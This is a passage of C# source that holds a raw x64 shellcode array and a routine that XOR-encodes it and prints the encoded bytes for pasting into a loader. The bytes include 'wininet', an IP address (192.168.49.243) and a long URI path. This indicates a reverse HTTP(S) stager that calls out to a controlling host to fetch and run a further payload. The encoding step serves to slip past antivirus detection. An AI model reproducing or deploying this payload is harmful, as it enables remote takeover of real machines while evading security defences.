0x48,0x01,0xd0,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,
0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,
0x6e,0x65,0x74,0x00,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,
0x07,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,
0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x00,0x00,0x00,0x00,0xff,0xd5,
0xe8,0x0f,0x00,0x00,0x00,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x34,0x39,
0x2e,0x32,0x34,0x33,0x00,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0xbb,0x01,0x00,
0x00,0x4d,0x31,0xc9,0x53,0x53,0x6a,0x03,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,
0x00,0x00,0x00,0x00,0xff,0xd5,0xe8,0x58,0x00,0x00,0x00,0x2f,0x35,0x32,0x52,
0x6b,0x4f,0x41,0x6e,0x35,0x71,0x67,0x35,0x6c,0x39,0x57,0x54,0x33,0x42,0x78,
0x39,0x49,0x78,0x51,0x56,0x30,0x4a,0x50,0x69,0x68,0x62,0x5f,0x57,0x38,0x70,
0x73,0x46,0x63,0x62,0x73,0x34,0x35,0x45,0x39,0x59,0x37,0x69,0x4d,0x4a,0x62,
0x35,0x6f,0x65,0x6f,0x52,0x59,0x4c,0x49,0x64,0x56,0x62,0x7a,0x51,0x6e,0x6e,
0x77,0x71,0x6b,0x7a,0x61,0x56,0x4b,0x64,0x55,0x4b,0x71,0x70,0x4b,0x74,0x34,
0x6c,0x7a,0x53,0x4c,0x4f,0x59,0x57,0x4f,0x00,0x48,0x89,0xc1,0x53,0x5a,0x41,
0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x00,0x32,0xa8,0x84,0x00,0x00,0x00,0x00,
0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,
0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x6a,0x1f,0x5a,0x52,0x68,0x80,0x33,0x00,0x00,
0x49,0x89,0xe0,0x6a,0x04,0x41,0x59,0x49,0xba,0x75,0x46,0x9e,0x86,0x00,0x00,
0x00,0x00,0xff,0xd5,0x4d,0x31,0xc0,0x53,0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,
0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,
0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,0x00,0x00,0x49,0xba,0x44,0xf0,0x35,
0xe0,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0xff,0xcf,0x74,0x02,0xeb,0xaa,0xe8,
0x55,0x00,0x00,0x00,0x53,0x59,0x6a,0x40,0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,
0x49,0xc7,0xc0,0x00,0x10,0x00,0x00,0x49,0xba,0x58,0xa4,0x53,0xe5,0x00,0x00,
0x00,0x00,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,
0x89,0xda,0x49,0xc7,0xc0,0x00,0x20,0x00,0x00,0x49,0x89,0xf9,0x49,0xba,0x12,
0x96,0x89,0xe2,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,
0x74,0xb2,0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,
0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5 };
// Encode the payload with XOR (fixed key)
//byte[] encoded = new byte[buf.Length];
//for (int i = 0; i < buf.Length; i++)
//{
// encoded[i] = (byte)((uint)buf[i] ^ 0xfa);
//}
byte[] encoded = xor(buf, Encoding.ASCII.GetBytes(key));
StringBuilder hex = new StringBuilder(encoded.Length * 2);
int totalCount = encoded.Length;
for (int count = 0; count < totalCount; count++)
{
byte b = encoded[count];
if ((count + 1) == totalCount) // Dont append comma for last item
{
hex.AppendFormat("0x{0:x2}", b);
}
else
{
hex.AppendFormat("0x{0:x2}, ", b);
}
if ((count + 1) % 15 == 0)
{
hex.Append("\\n");
}
}
//Console.WriteLine($"XOR payload (key: 0xfa):");
Console.WriteLine($"XOR payload (key:{key}):");
Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{\\n{hex}\\n}};");
//// Decode the XOR payload
//for (int i = 0; i < buf.Length; i++)
//{
// buf[i] = (byte)((uint)buf[i] ^ 0xfa);
//}
}
}
}